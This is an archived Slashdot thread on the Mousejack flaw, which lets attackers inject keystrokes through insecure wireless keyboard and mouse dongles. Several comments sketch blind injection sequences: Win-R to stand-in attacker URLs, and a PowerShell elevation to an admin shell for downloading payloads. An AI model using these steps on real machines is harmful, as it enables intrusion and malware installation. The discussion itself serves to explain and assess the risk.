Follow Slashdot blog updates by subscribing to our blog RSS feed

 



Forgot your password?
typodupeerror
×
Security Bug Wireless Networking

Mousejack Attacks Exploit Wireless Keyboards and Mice (threatpost.com) 112

msm1267 writes: Researchers have discovered a vulnerability in the USB devices that support wireless keyboards and mice that could put a countless number of devices at risk to attack. Seven manufacturers have been informed of the flaw, but as of today, only Logitech has produced a firmware update. Some have no update mechanism and can never be patched. The issue lies in the fact that some of the commands from the peripheral device to the dongle are not encrypted. Most do not authenticate packets and an attacker within close proximity and using a USB transmitting malicious packets over radio frequency can trick the victim's machine into accepting mouse clicks impersonating keystrokes. It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.
This discussion has been archived. No new comments can be posted.

Mousejack Attacks Exploit Wireless Keyboards and Mice

Comments Filter:
  • by Chris Mattern ( 191822 ) on Tuesday February 23, 2016 @02:07PM (#51569209)

    ...is why you should be using bluetooth instead of cheaping out. Saves a USB port, too!

    • by wardrich86 ( 4092007 ) on Tuesday February 23, 2016 @02:18PM (#51569289)

      Saves a USB port, too!

      But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PC's that come with native Bluetooth support

      • Dunno. My ~4 year old ASUS motherboard has bluetooth on board.

      • I was assuming a laptop, which almost always has built-in Bluetooth. A desktop with no Bluetooth I'd just use a wire.

        • This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be h

          • This is a good point... realistically, why do the wireless keyboard/mouse makers use their own protocol, which is most likely far less secure than something designed by people who know what they are doing? BT is a relatively open protocol that has stood the test of time. Yes, it has had its security issues, but after 10+ years, it is pretty robust, and is definitely good enough, assuming proper pairing with 4-6 digit PINs (and re-pairing happens very infrequently.) If one needs more security, it can be handled at the application layer.

            When I see some mouse or keyboard requiring its own dongle, I move on. If they are too cheap to use an industry standard for their stuff, then I'm suspecting they skimped on security somewhere else.

            I don't know one way or the other, so this is pure speculation, but it may be a cost issue. Some may scoff, but virtually any difference in wholesale / production level quantity costs beyond the trivial usually means one wins overwhelmingly over the other. A case in point ... Firewire chips (the original 400 MHz versions) were about $25 in wholesale / 1000 qty versus USB 1.1 at around $15. FW has significant performance advantages over USB, not the least of which is it is fully self-managing whereas USB req

      • by hondo77 ( 324058 )

        Not sure of many PC's that come with native Bluetooth support.

        Besides iMacs, which have had it for ten years.

      • You have a better chance that your computer already has Bluetooth than it has some random proprietary wireless method.

        • That's true, but I can't see wireless KBM packages coming with bluetooth adapters any time soon... though if they switch to Bluetooth, it might make the dongles more available and possibly cheaper.
      • But you'd need a Bluetooth dongle to get that connection... so you'd still be out a USB port. Not sure of many PC's that come with native Bluetooth support

        Most laptops, many all-in-ones, and a few desktops have bluetooth built in. Of course, it's usually attached to the USB bus... but not always

    • Comment removed based on user account deletion
      • I thought someone is deploying tools to give rodents hand jobs, and that was terribly odd to be on /.

      • I wish Dell still made the MNY-RAQ-DEL2. I bought four of them when I found a batch of new old stock on eBay.
        • by I4ko ( 695382 )
          and I wish Microsoft still made Microsoft Bluetooth Notebook Mouse 5000 which was about the best mouse I ever used. I do have 3 of them, but recently got a Logitech M535 that is not too bad, but a little bigger than I would like.
    • Or, just use a wired keyboard and mouse. Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?

      • Not every user of a "desktop" computer sits in front of a desk; some sit on a bed or couch (HTPC anyone?). Then there are those who just don't like wires for aesthetic reasons.

      • And then there's the %#@%$@ mess on my desktop always getting in the way of the mouse's cable.

      • Wireless keyboard on a desk has always seemed particularly ridiculous to me - the thing doesn't need to move, so why is having a cable an issue?

        But the keyboard does move -- usually to temporarily make room for something else: notepad, snacks, book, body parts. And then the cable invariably trips either the wine glass or the coffee cup. The wireless signals have a better track record of not doing that.

      • Comment removed based on user account deletion
        • I'm the only person in my office that still uses wired keyboard and mouse and I don't find it inconvenient at all. My mug of tea sits between the keyboard and mouse cables and there have been no mishaps.

    • by Aaden42 ( 198257 )

      Used to be the case that the reaction time on non-BT wireless was quicker. It wasn't necessarily cheaping out as the proprietary solution actually provided a benefit. More overhead in the BT protocol meant more lag. Not sure if that's still true with current BT hardware/software stacks.

      Not something you'd notice typing in the office, but gamers...

      • by tlhIngan ( 30335 )

        Used to be the case that the reaction time on non-BT wireless was quicker. It wasn't necessarily cheaping out as the proprietary solution actually provided a benefit. More overhead in the BT protocol meant more lag. Not sure if that's still true with current BT hardware/software stacks.

        Not something you'd notice typing in the office, but gamers...

        The other problem I had with Bluetooth is stuck keys or sticky keys caused by flaky signals. I used to use an Apple Bluetooth keyboard with my Mac Mini. It worked,

        • by KGIII ( 973947 )

          I know this is gonna sound strange, but when it comes to input devices like keyboards and mice, I've had really good luck with Microsoft. I dunno who's making 'em or if they're just rebadged OEM stuff but they're pretty good. I noticed quite by accident and not entirely intentionally. They're good enough that I've stuck with 'em for a long time and have been really happy given the times I've had to use other products.

          • by Aaden42 ( 198257 )
            Not strange... I've got MS keyboards plugged into both of my Macs. Feels like ordering a Coke & Pepsi cocktail, but they're decent keyboards. Still holding out hope for finding a decent clicky microswitch (like IBM XT period keyboards) that has an ergonomic split and doesn't cost my first born, but until then... MS keyboards, Logitech mice.
  • by Anonymous Coward

    Pick one.

    Security is always a trade-off, where you decide how determined your attacker is going to be, and weigh that against convenience.

    If you're choosing wireless peripherals, you are leaning so far toward the "convenient" that you're wasting your time if you think any other security measures can make up for it.

  • No way (Score:5, Funny)

    by the_skywise ( 189793 ) on Tuesday February 23, 2016 @02:11PM (#51569239)

    There's no way my wireless keyboard could ever be hacked in this fashion beca I MADE $125,000 YEAR BY USING THESE SIMPLE STEPS - CLICK HERE TO LEARN MORE http://888999444333.ze/?bypass... [888999444333.ze]

    • DING! WINNER! Internet won! Time to go home everyone, we're done for the day!

    • Silly person -- using a keyboard that &$*#@78g9789%^&#$%^&@$# -- wait, switching to my wired keyboard now. Using a keyboard that can be hijacked like that.

      Hold on, my malfunctioning wireless keyboard is blinking something on the LEDs -- S-I-G-N-A-L-J-A-M-M-E-D-N-O-C-A-R-R ...

    • by KGIII ( 973947 )

      Ah, one of my favorite quotes is from a buddy of mine who had lived in the Deep South... "I ain't never scared."

      Your link doesn't resolve. Yes, yes I did click it. I figured someone had to.

  • Just how much of a risk is there to this exploit?

    "A Logitech spokesman told the MIT Technology review that the company has a software update to fix the issue, but that the vulnerability Bastille detected “would be complex to replicate” since it requires being physically close to the victim, which makes it “a difficult and unlikely path of attack.”

    It seems to me that you would have to be fairly close to the system that you are attacking as the USB plug doesn't have a lot of power or r

    • Just how much of a risk is there to this exploit?

      How much of a potential reward is there?

      Things like this usually show it's technically feasible, even if impractical. But if the payoff is high enough, it's probably worth someone doing.

      Today's "too difficult to replicate" can easily become "tomorrow's hack in the wild". But if someone sees enough possible payoff for doing it, it's just one more thing.

      And it seems there's always someone looking to exploit anything just because it's there.

      • by dbIII ( 701233 )
        With credit card details entered via keyboard the reward could be enormous.
        With such an obvious motive I have zero sympathy for the utter losers that rushed their product out the door with inadequate security. The products are not fit for the purpose they are designed for.
        • With such an obvious motive I have zero sympathy for the utter losers that rushed their product out the door with inadequate security.

          Of course, the problem with that is that the "losers that rushed their product out the door with inadequate security" aren't the people we need to feel sorry for in this case ... like every other piece of shit consumer technology with non-existent security, it's the consumer who suffers.

          Put the makers of this tech on the hook for paying damages, or throw the CEOs in jail .. t

    • Just how much of a risk is there to this exploit?

      The answer is "enough." I can't imagine coming under this kind of attack myself, but it should be cause enough for a targettable company that deals with sensitive (valuable) data to think twice about rolling out wireless keyboards/mice.

      it requires being physically close to the victim['s computer]

      which could be on the other side of a locked door, or a (fairly thin) wall, or a floor...

    • by Fencepost ( 107992 ) on Tuesday February 23, 2016 @03:36PM (#51569919) Journal
      The risk from this could actually turn out to be really high - perhaps not to any individual system, but to an office environment. TFA includes "100 meters" and "a $15 USB dongle and 15 lines of Python code" which I could believe.

      The issue is that if this can be a broadcast attack, it doesn't need to be successful any more than hacking an ad network needs 100% infection rates - if I can drive up outside a multi-story office building with a cheap adapter at the end of a USB extension cable (and perhaps an appropriate dish) and broadcast "Win-R http://attacksite.site/<Enter>", how many of the PCs in window offices will load that site which loads various exploits based on detection of the browser? This is even better than spearphishing because I don't have to worry about getting through email filters, and if I manage it right I know what company/companies I targeted at what time along with my trojan access to one or more computers within those offices.

      Remember, this is injection of events, not 2-way communication. There's no handshaking or anything else.

      I'm going to be keeping track of this and probably pushing some customers to eliminate or at least replace some cordless equipment - that was an agenda item before, but this can make it a high-priority agenda item.
  • Load malware? (Score:2, Insightful)

    by Cigaes ( 714444 )

    “It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”

    Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?

    For a particular target, a way can probably be devised, but it will most likely be slow and visible. And not work with the next target.

    Injecting keys is clearly a security flaw with severe consequences, but over-hyping it is unproductive.

    • Re:Load malware? (Score:4, Informative)

      by wonkey_monkey ( 2592601 ) on Tuesday February 23, 2016 @03:25PM (#51569835) Homepage

      Really? With just keystrokes and mouse moves?

      Yup. Actually, just keystrokes - the summary's a bit confused on the subject, but the article says nothing about spoofing mouse moves and clicks - it does, however, say that in some cases an attacker can impersonate the mouse but use it to send keypress packets (the keyboards in question encrypt these, but the receiver accepts them unencrypted from the "mouse").

      but it will most likely be slow and visible

      Not necessarily. What if you want access to a computer you can see through a window (and verify that no-one is near), but is behind a locked door? Even if you can't see the screen, sending Win+R c m d [enter] and so on seems fairly doable.

    • Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?

      start-button->cmd->ftp(malware site & file)->execute downloaded malicious file.

      as long as the start button isn't actually up when you do it, it should have a reasonable chance of success.

      • by Cigaes ( 714444 )

        What's a “start button”? :-

        And to wonkey_monkey: what would “òcmd” achieve? “ò” is the character that XTerm generates with win-R.

        To achieve anything, you need either feedback (“see through a window”) or strong assumptions about the user interface currently running.

        • What's a “start button”?

          The button that typically has the picture of a window on it.

          start->R gives you the ability to execute a command via type interface on windows. Use it to spawn a CLI shell. use CLI shell to write a script that spawns a process that downloads & executes the malware.

          Yes, it's operating system specific. So freaking what? So isn't the malware I'm going to attempt to load. There's not enough linux users out there to matter, as the AC mentions. Crackers, like terrorists, like to target soft targets.

          • testing with my Mint install: Alt-F2 instead, then gnome-terminal.
            or start button ->terminal
            both bring up a command prompt, which will allow you to(depending on settings) download and execute a file.

            assuming they're not stupid enough to run as root, they're at least limited to the user's rights unless an exploit exists; getting code to execute on the target machine is 90% of the work.

    • Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?

      On Windows, sure:

      Win-R
      "powershell" + Enter
      "start-process powershell -verb runas" + Enter
      one left-arrow key
      Enter

      This should work on practically any Windows install that includes PowerShell and is at a live desktop. You're now at an admin shell from which you can download whatever you want and run it. As you mentioned, all of this activity will be visible, but if you're away from the keyb
      • by Cigaes ( 714444 )

        So it works in certain cases with a lot of assumptions. Exactly what I was saying.

        • You asked for keystrokes/mouse moves only, with no feedback about where they went. I provided a practical example that will work for a lot of machines, that's all.
        • So it works in certain cases with a lot of assumptions. Exactly what I was saying.

          Where "certain cases with a lot of assumptions" equals "a computer running a recent version of Windows". I'm guessing that there might be a few of those out there.

          • by KGIII ( 973947 )

            The terminal is *usually* mapped to CTRL + ALT + T with *most* distros that I've actually dug into. I've noticed one that didn't do that, I think I've made it so it *does* do that on that VM. I can dig it back out. I didn't check it on all of 'em nor have I tried all of 'em. I'm pretty sure that if I can get that close to the device, I can take a minute to figure out what the OS is. Hell, I can probably find the layout and then write a shim and mirror it over a replicated desktop and map mouse movements, al

          • Where "certain cases with a lot of assumptions" equals "a computer running a recent version of Windows"

            And where "recent" equals "any version released in the last 10 years".
    • by txmason ( 882110 )

      “It would take a matter of seconds for the attacker's code to load a rootkit, malware or additional network access.”

      Really? With just keystrokes and mouse moves? With no feedback about where the keystrokes and clicks end up?

      Win-R -> http://www.malicious-site.com/ [malicious-site.com] -> flash exploit (or whatever)

      matter of seconds.

    • "With no feedback about where the keystrokes and clicks end up?"

      I'm guessing most OSes have a hot key to access the menu, from there you can start an appropriate terminal using just keystrokes, and once in a terminal, well.... it's open slather. Don't dismiss what can be done with just keystrokes.

      • by Cigaes ( 714444 )
        But “most OSes have” is not commutative: for most OSes, there may be a key, but there is no single key common to all OSes and user environment. So basically, without feedback, you can expect to take over microsoft's gaming environment, nothing more. There are bigger security holes in it.
        • "without feedback"

          Except you do get feedback... whether your OS-specific exploit worked or not. If it does work, then the target is using that exploit. If not, try an exploit specific to a *different* OS. Start off just trying to ping a known address where you are logging, and note which stage gives you a ping that actually shows up in the log. Once you have identified the OS then you can get on with the real payload.

    • by dbIII ( 701233 )

      Really? With just keystrokes and mouse moves?

      Yes. Keyboard shortcut to launch browser then URL.

      With no feedback about where the keystrokes and clicks end up?

      If you order it to download your rootkit or whatever you can get feedback from wherever you have hosted your little bit of nastiness to tell you that it has been picked up.

    • Re:Load malware? (Score:4, Informative)

      by complete loony ( 663508 ) <Jeremy.Lakeman@nOSpaM.gmail.com> on Wednesday February 24, 2016 @04:37AM (#51573617)
      Hack a computer just by typing? Absolutely [trustedsec.com].
      • by Cigaes ( 714444 )

        Yes, just typing, and in a matter of seconds. Just typing: no seeing what you type, no knowing the keyboard layout, no knowing the user interface running, nothing except keys blindly. As was already pointed out by numerous persons before you posted your duplicated comment, this would work on lusers computers left to the default values. A rather costly attack (requires hardware and physical presence) that can only work generically on the most worthless of targets. Not really worrying. (Of course, for targete

        • Don't need to know the keyboard layout. Only need to guess that it's a window's machine that is unlocked. You could also move the mouse or perhaps press the scoll-lock key occasionally to prevent the screen saver from automatically starting.

          Unlike most of the other responses that I scanned through at the time, which required a browser exploit, or ftp access. This approach could be used to run arbitrary code without the assistance of a 3rd party server, or a known browser exploit. It only depended on Win+R,

          • by Cigaes ( 714444 )

            Two mistakes in your message:

            “Don't need to know the keyboard layout”: how do you type the ‘m’ in “cmd” on an AZERTY keyboard?

            “Arbitrary code”: no, only code that is already present on the computer. Typing binaries with just the keyboard and generic software is tricky.

            • We're talking about a targeted attack that requires local (-ish) access. Firstly you can probably assume the target has a locale appropriate to their location. However that isn't required, as a USB HID device can send raw 16-bit unicode.

              Did you really read that link?

              # our hex binary
              shell_exec = "4d5a90000300000004000....

              That's a hex dump of a PE .exe file. They then type a powershell script to convert it to binary. That's arbitrary code right there. Unless you have gone to unusual lengths to prevent the launching of an .exe.

  • mouse clicks impersonating keystrokes.

    The article is clearer on what this suppoed to mean:

    An attacker can impersonate the mouse but transmit keypress-packets

  • Say goodbye Microsoft keyboard and mouse. Glad I had a spare :-/

    Affected devices [bastille.net]

  • Searching for a new keyboard on Amazon and seeing all the existing USB keyboards being sold with this vulnerability really pisses me off. It's some major fucking fraud to keep selling a product with this vulnerability.
  • As of 13:35 Pacific time, the updated Logitech firmware doesn't seem to be actually downloadable.

    It's nice of Logitech to develop such software, but they actually have to publish it for it to make a difference.

    (Tried both my OSX and Windows 7 machines, the Logitech Unify software says no updates available, nothing but questions on their forum)

  • So where's this Logitech firmware update? I searched their website, looked at the downloads offered for my mouse (MX Master), and there isn't a firmware update utility. Checked all OSes.

    I wish I could use just bluetooth with it instead of the dongle, but Ubuntu 14.04 doesn't seem to work with it with bluetooth... My chromebook on the other hand works flawlessly.

  • by Anonymous Coward

    Here ya go...
    https://forums.logitech.com/t5... [logitech.com]

  • by eth1 ( 94901 ) on Tuesday February 23, 2016 @05:17PM (#51570649)

    I worked as a one-man IT dept for a small private school for a few years. Someone donated a bunch of wireless keyboard/mouse sets one year, which were used by several of the teachers (without my involvement).

    Shortly afterwards, I started getting odd "OMG, my computer is infected" reports. Mouses were moving on their own, and random typing was appearing out of nowhere.

    The ethernet jacks were usually on shared walls, which resulted in PCs ending up on opposite sides of the same wall (only 2-3 feet apart). Since the devices only had three channels, several of these pairs had ended up on the same one, with hilarity ensuing. :)

  • Could this hack be reversed, ie: log keystrokes from a wireless keyboard? That sounds substantially more dangerous and more useful to a hacker than sending keystrokes. I've always been wary of wireless keyboard for this reason, but mice are pretty much a non-issue if their data could be captured. Mouse data sending is probably just as useless.

  • by Anonymous Coward

    Here's the official statement from Logitech.

    The post:
    http://forums.logitech.com/t5/Mice-and-Pointing-Devices/Logitech-Response-to-Unifying-Receiver-Research-Findings/m-p/1493878/thread-id/73186

    The file
    http://logt.ly/0222
    DL the linked file, run it (it will not really do anything that you can see) then try updating the firmware thru the Unifying software. It is all in the post

    I installed this and it breaks a few things in the software, like displaying variables instead of the text in the update options, but i

  • Not only do wireless keyboards and mice (regardless of technology) chew through batteries but they are also vulnerable to attacks? Glad I am not using them on my PC then (Logitech K120 keyboard and Gigabyte GM-M6580 laser mouse)

    • Not only do wireless keyboards and mice (regardless of technology) chew through batteries but they are also vulnerable to attacks?

      I have to replace the batteries in my BT keyboard about every six months. My BT mouse is still on its original set, two years later.

Two can Live as Cheaply as One for Half as Long. -- Howard Kandel

Working...